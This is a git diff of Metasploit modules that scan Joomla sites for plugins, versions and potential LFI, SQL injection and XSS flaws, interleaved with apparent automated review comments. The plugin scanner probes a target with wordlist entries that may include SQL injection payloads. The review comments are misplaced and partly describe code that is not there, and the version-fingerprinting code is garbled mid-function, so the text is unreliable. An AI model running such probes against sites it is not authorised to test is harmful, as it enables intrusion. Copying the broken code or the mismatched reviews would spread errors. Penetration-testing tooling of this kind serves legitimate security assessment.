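Review bot: The metadata in initialize names this module 'Joomla Version Scanner' while its description and run_host only probe a fixed list of common pages, so it collides with joomla_version.rb added in the same commit and will mislead `search`/`info` output; `'Name' => 'Joomla Page Scanner'` matches what the code does. The fallback 403 message `vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")` reads as a typo next to the sibling branches' "denied access" wording. The page classification keys on English strings (`Administration Login`, `class="validate">Register<\/button>`), so non-English Joomla installs will presumably be reported only as a bare "Page Found"; a comment above the `note = "Page Found"` line noting that the heuristics are English-only would help whoever tunes them.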
@@ -0,0 +1,175 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to + # Joomscan and various MSF modules for code examples. + def initialize + super( + 'Name' => 'Joomla Plugins Scanner', + 'Description' => %q{ + This module scans a Joomla install for plugins and potential + vulnerabilities. + }, + 'Author' => [ 'newpid0' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']), + OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")]) + ], self.class) + end + + def peer + return "#{rhost}:#{rport}" + end + + def run_host(ip) + tpath = normalize_uri(target_uri.path) + if tpath[-1,1] != '/' + tpath += '/' + end + + vprint_status("#{peer} - Checking for interesting plugins") + res = send_request_cgi({ + 'uri' => tpath, + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |line| + papp = line.chomp + plugin_search(tpath, papp, ip, res.body.size) + end + end + + def plugin_search(tpath, papp, ip, osize) + res = send_request_cgi({ + 'uri' => "#{tpath}#{papp}", + 'method' => 'GET' + }) + return if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + nsize = res.body.size + + if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) + print_good("#{peer} - Plugin: #{tpath}#{papp} ") + report_note( + :host => ip, + :port => rport, + :proto => 'http', + :ntype => 'joomla_plugin', + :data => "#{tpath}#{papp}", + :update => :unique_data + ) + + if (papp =~/passwd/ and res.body =~/root/) + print_good("#{peer} - Vulnerability: Potential LFI") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'root' signature", + :risk => 1, + :confidence => 10, + :category => 'Local File Inclusion', + :description => "Joomla: Potential LFI at #{tpath}#{papp}", + :name => 'Local File Inclusion' + ) + elsif (res.body =~/SQL syntax/) + print_good("#{peer} - Vulnerability: Potential SQL Injection") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the 'SQL syntax' signature", + :risk => 1, + :confidence => 10, + :category => 'SQL Injection', + :description => "Joomla: Potential SQLI at #{tpath}#{papp}", + :name => 'SQL Injection' + ) + elsif (papp =~/>alert/ and res.body =~/>alert/) + print_good("#{peer} - Vulnerability: Potential XSS") + report_web_vuln( + :host => ip, + :port => rport, + :vhost => vhost, + :ssl => ssl, + :path => tpath, + :method => "GET", + :pname => "", + :proof => "Response with code #{res.code} contains the '>alert' signature", + :risk => 1, + :confidence => 10, + :category => 'Cross Site Scripting', + :description => "Joomla: Potential XSS at #{tpath}#{papp}", + :name => 'Cross Site Scripting' + ) + elsif (papp =~/com_/) + vars = papp.split('_') + pages = vars[1].gsub('/','') + res1 = send_request_cgi({ + 'uri' => "#{tpath}index.php?option=com_#{pages}", + 'method' => 'GET' + }) + if (res1.code == 200) + print_good("#{peer} - Page: 
#{tpath}index.php?option=com_#{pages}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_page', + :data => "Page: #{tpath}index.php?option=com_#{pages}", + :update => :unique_data + ) + else + vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response") + end + end + elsif (res.code == 403) + if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} ip access to #{ip} (SSL Required)") + elsif (res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif (res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") + end + end + return + + rescue OpenSSL::SSL::SSLError + vprint_error("#{peer} - SSL error") + return + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + vprint_error("#{peer} - Unable to Connect") + return + rescue ::Timeout::Error, ::Errno::EPIPE + vprint_error("#{peer} - Timeout error") + return + end + +end diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb new file mode 100755 index 0000000000..5ccdfe89d7 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_version.rb 
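Review bot: `res1` is dereferenced unchecked in the com_ branch (`if (res1.code == 200)`) while `res` just above it is guarded with `return if res.nil?`; a request that times out or is refused returns nil there and raises NoMethodError, which none of the rescue clauses catch, so add `return if res1.nil?` before the status check. The LFI signature `res.body =~/root/` fires on any page that contains the word "root"; matching the passwd line shape, `res.body =~ /root:.*:0:0:/`, would cut false positives substantially. `File.open(datastore['PLUGINS'], 'rb').each_line` never closes the handle; `File.foreach(datastore['PLUGINS'])` does the same job and closes it. Note also that this module sends every wordlist line verbatim — if joomla.txt inherits entries from the removed pcheck.txt list seen earlier in this series, that includes UNION SELECT and BENCHMARK(9999999999,…) payloads that actively exploit or load the target's database, and the description ("scans a Joomla install for plugins") should say so rather than let operators treat it as passive enumeration.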
@@ -0,0 +1,176 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ # Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
+ # Joomscan and various MSF modules for code examples.
+ def initialize
+ super(
+ 'Name' => 'Joomla Version Scanner',
+ 'Description' => %q{
+ This module scans a Joomla install for information about the underlying
+ operating system and Joomla version.
+ },
+ 'Author' => [ 'newpid0' ],
+ 'License' => MSF_LICENSE
+ )
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
+ ], self.class)
+ end
+
+ def peer
+ return "#{rhost}:#{rport}"
+ end
+
+ def os_fingerprint(response)
+ if not response.headers.has_key?('Server')
+ return "Unkown OS (No Server Header)"
+ end
+
+ case response.headers['Server']
+ when /Win32/
+ when /\(Windows/
+ when /IIS/
+ os = "Windows"
+ when /Apache\//
+ os = "*Nix"
+ else
+ os = "Unknown Server Header Reporting: "+response.headers['Server']
+ end
+ return os
+ end
+
+ def fingerprint(response)
+ case response.body
+ when /(.+)<\/version\/?>/i
+ v = $1
+ out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" + when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ + when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ + when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ + when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ + when /20196 2011\-01\-09 02\:40\:25Z ian/ + out = "1.6" + when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / + when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ + when /22183 2011\-09\-30 09\:04\:32Z infograf768/ + when /21660 2011\-06\-23 13\:25\:32Z infograf768/ + out = "1.7" + when /Joomla! 1.5/ + when /MooTools\=\{version\:\'1\.12\'\}/ + when /11391 2009\-01\-04 13\:35\:50Z ian/ + out = "1.5" + when /Copyright \(C\) 2005 \- 2012 Open Source Matters/ + when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ + out = "2.5" + when /\s+ "#{tpath}#{file}", + 'method' => 'GET' + }) + + return :abort if res.nil? + + res.body.gsub!(/[\r|\n]/, ' ') + + if (res.code == 200) + os = os_fingerprint(res) + out = fingerprint(res) + return false if not out + + if(out =~ /Unknown Joomla/) + print_error("#{peer} - Unable to identify Joomla Version with #{file}") + return false + else + print_good("#{peer} - Joomla Version:#{out} from: #{file} ") + print_good("#{peer} - OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'joomla_version', + :data => out + ) + return true + end + elsif (res.code == 403) + if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) + vprint_status("#{ip} denied access to #{ip} (SSL Required)") + elsif(res.body =~ /has a list of IP addresses that are not allowed/) + vprint_status("#{ip} restricted access by IP") + elsif(res.body =~ /SSL client certificate is required/) + vprint_status("#{ip} requires a SSL client certificate") + else + vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") + end + return :abort + end + + return false + + rescue 
OpenSSL::SSL::SSLError
+ vprint_error("#{peer} - SSL error")
+ return :abort
+ rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+ vprint_error("#{peer} - Unable to Connect")
+ return :abort
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ vprint_error("#{peer} - Timeout error")
+ return :abort
+ end
+
+ def run_host(ip)
+ tpath = normalize_uri(target_uri.path)
+ if tpath[-1,1] != '/'
+ tpath += '/'
+ end
+
+ files = [
+ 'language/en-GB/en-GB.xml',
+ 'templates/system/css/system.css',
+ 'media/system/js/mootools-more.js',
+ 'language/en-GB/en-GB.ini',
+ 'htaccess.txt',
+ 'language/en-GB/en-GB.com_media.ini'
+ ]
+
+ vprint_status("#{peer} - Checking Joomla version")
+ files.each do |file|
+ joomla_found = check_file(tpath, file, ip)
+ return if joomla_found == :abort
+ break if joomla_found
+ end
+ end
+
+end
diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb
deleted file mode 100755
index 2ad9d2f040..0000000000
--- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb
+++ /dev/null
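Review bot: In os_fingerprint the first two `when` arms (`/Win32/` and `/\(Windows/`) have empty bodies, and a Ruby `when` does not fall through, so a server matching either leaves `os` nil and check_file prints `OS: ` with nothing after it; only `/IIS/` actually reaches `os = "Windows"`. Join the alternatives into one arm, `when /Win32/, /\(Windows/, /IIS/`, directly above `os = "Windows"`. fingerprint repeats the pattern in every version group (four empty arms before `out = "1.6"`, three before `"1.7"`, two before `"1.5"`, one before `"2.5"`), so a body that matches any signature but the last of its group yields nil and check_file stops at `return false if not out` without reporting a version; the same comma-joined form fixes each group, e.g. `when /Joomla! 1.5/, /MooTools\=\{version\:\'1\.12\'\}/, /11391 2009\-01\-04 13\:35\:50Z ian/`. The end of fingerprint and the start of check_file are garbled in this rendering, so the remaining group could not be checked; the `"Unkown OS (No Server Header)"` string is also misspelled.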
@@ -1,303 +0,0 @@
-##
-# $Id: joomla_vulnscan.rb
-##
-##
-# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to Joomscan and various MSF modules for code examples.
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-require 'msf/core'
-
-class Metasploit3 < Msf::Auxiliary
-
- include Msf::Exploit::Remote::HttpClient
- include Msf::Auxiliary::Scanner
- include Msf::Auxiliary::Report
-
- def initialize
- super(
- 'Name' => 'Joomla Scanner',
- 'Description' => %q{
- This module scans a Joomla install for information, plugins and potential vulnerabilites.
- },
- 'Author' => [ 'newpid0' ],
- 'License' => MSF_LICENSE
- )
- register_options(
- [
- OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
- OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]),
-
- OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate",
- File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")
- ]
- )
-
- ], self.class)
- end
-
- def osfingerprint(response)
- if(response.headers.has_key?('Server') )
- if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/)
- os = "Windows"
- elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/)
- os = "*Nix"
- else
- os = "Unknown Server Header Reporting: "+response.headers['Server']
- end
- end
- return os
- end
-
- def fingerprint(response)
- if(response.body =~ /(.+)<\/version\/?>/i)
- v = $1
- out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" - elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or - response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or - response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or - response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) - out = "1.6" - elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or - response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) - out = "1.7" - elsif(response.body =~ /Joomla! 1.5/ or - response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) - out = "1.5" - elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or - response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) - out = "2.5" - elsif(response.body =~ /\s+ tpath, - 'method' => 'GET', - }, 5) - return if not bres or not bres.body or not bres.code - bres.body.gsub!(/[\r|\n]/, ' ') - File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| - papp = bapp.chomp - plugin_search(tpath,papp,ip,bres) - end - end - end - - def check_app(tpath, app, ip) - res = send_request_cgi({ - 'uri' => "#{tpath}" << app, - 'method' => 'GET', - }) - return :abort if res.nil? 
- return if not res or not res.body or not res.code
- res.body.gsub!(/[\r|\n]/, ' ')
- os = osfingerprint(res)
- if (res.code == 200)
- out = fingerprint(res)
- return if not out
- if(out =~ /Unknown Joomla/)
- print_error("#{peer} - Unable to identify Joomla Version with this file #{app}")
- return false
- else
- print_good("#{peer} - Joomla Version:#{out} from: #{app} ")
- print_good("#{peer} - OS: #{os}")
- report_note(
- :host => ip,
- :port => datastore['RPORT'],
- :proto => 'http',
- :ntype => 'Joomla Version',
- :data => out
- )
- return true
- end
- elsif(res.code == 403)
- if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
- vprint_status("#{ip} denied access to #{ip} (SSL Required)")
- elsif(res.body =~ /has a list of IP addresses that are not allowed/)
- vprint_status("#{ip} restricted access by IP")
- elsif(res.body =~ /SSL client certificate is required/)
- vprint_status("#{ip} requires a SSL client certificate")
- else
- vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
- end
- else
- return
- end
- rescue OpenSSL::SSL::SSLError
- vprint_error("#{peer} - SSL error")
- return
- rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
- vprint_error("#{peer} - Unable to Connect")
- return
- rescue ::Timeout::Error, ::Errno::EPIPE
- vprint_error("#{peer} - Timeout error")
- return
- end
-
- def scan_pages(tpath, iapp, ip)
- res = send_request_cgi({
- 'uri' => "#{tpath}" << iapp,
- 'method' => 'GET',
- })
- return if not res or not res.body or not res.code
- res.body.gsub!(/[\r|\n]/, ' ')
- if (res.code == 200)
- if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
- sout = "**Administrator Login Page"
- elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
- sout = 
"**Registration Page" - else - sout = iapp - end - return if not sout - if(sout == iapp) - print_good("#{peer} - Page: #{tpath}#{iapp}") - elsif print_good("#{peer} - Page: #{tpath}#{iapp} #{sout}") - report_note( - :host => ip, - :port => datastore['RPORT'], - :proto => 'http', - :ntype => 'Joomla Pages', - :data => sout - ) - end - elsif(res.code == 403) - if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) - vprint_status("#{ip} denied access to #{ip} (SSL Required)") - elsif(res.body =~ /has a list of IP addresses that are not allowed/) - vprint_status("#{ip} restricted access by IP") - elsif(res.body =~ /SSL client certificate is required/) - vprint_status("#{ip} requires a SSL client certificate") - else - vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") - end - else - return - end - rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") - return - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") - return - rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") - return - end - - def plugin_search(tpath, papp, ip, bres) - res = send_request_cgi({ - 'uri' => "#{tpath}" << papp, - 'method' => 'GET', - }) - return if not res or not res.body or not res.code - res.body.gsub!(/[\r|\n]/, ' ') - osize = bres.body.size - nsize = res.body.size - if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize)
- print_good("#{peer} - Plugin: #{tpath}#{papp} ")
- if (papp =~/passwd/ and res.body !~/root/)
- vprint_error("#{peer} - Vulnerability: LFI not found")
- elsif(papp =~/passwd/ and res.body =~/root/)
- print_good("#{peer} - Vulnerability: Potential LFI")
- elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/)
- print_good("#{peer} - Vulnerability: Potential SQL Injection")
- elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/)
- vprint_error("#{peer} - Vulnerability: Unable to identify SQL injection")
- elsif(papp =~/>alert/ and res.body !~/>alert/)
- vprint_error("#{peer} - Vulnerability: No XSS")
- elsif(papp =~/>alert/ and res.body =~/>alert/)
- print_good("#{peer} - Vulnerability: Potential XSS")
- elsif(res.body =~/SQL syntax/ )
- print_good("#{peer} - Vulnerability: Potential SQL Injection")
- elsif(papp =~/com_/)
- vars = papp.split('_')
- pages = vars[1].gsub('/','')
- res1 = send_request_cgi({
- 'uri' => "#{tpath}"<<"index.php?option=com_#{pages}",
- 'method' => 'GET',
- }, 5)
- if (res1.code == 200)
- print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
- else
- vprint_error("#{peer} - Page: #{tpath}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response")
- end
- end
- report_note(
- :host => ip,
- :port => datastore['RPORT'],
- :proto => 'http',
- :ntype => 'Plugin Found',
- :data => papp
- )
- elsif(res.code == 403)
- if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
- vprint_status("#{ip} ip access to #{ip} (SSL Required)")
- elsif(res.body =~ /has a list of IP addresses that are not allowed/)
- vprint_status("#{ip} restricted access by IP")
- elsif(res.body =~ /SSL client certificate is required/)
- vprint_status("#{ip} requires a SSL client certificate")
- 
else
- vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
- end
- else
- return
- end
-
- rescue OpenSSL::SSL::SSLError
- vprint_error("#{peer} - SSL error")
- return
- rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
- vprint_error("#{peer} - Unable to Connect")
- return
- rescue ::Timeout::Error, ::Errno::EPIPE
- vprint_error("#{peer} - Timeout error")
- return
- end
-
-
-
-end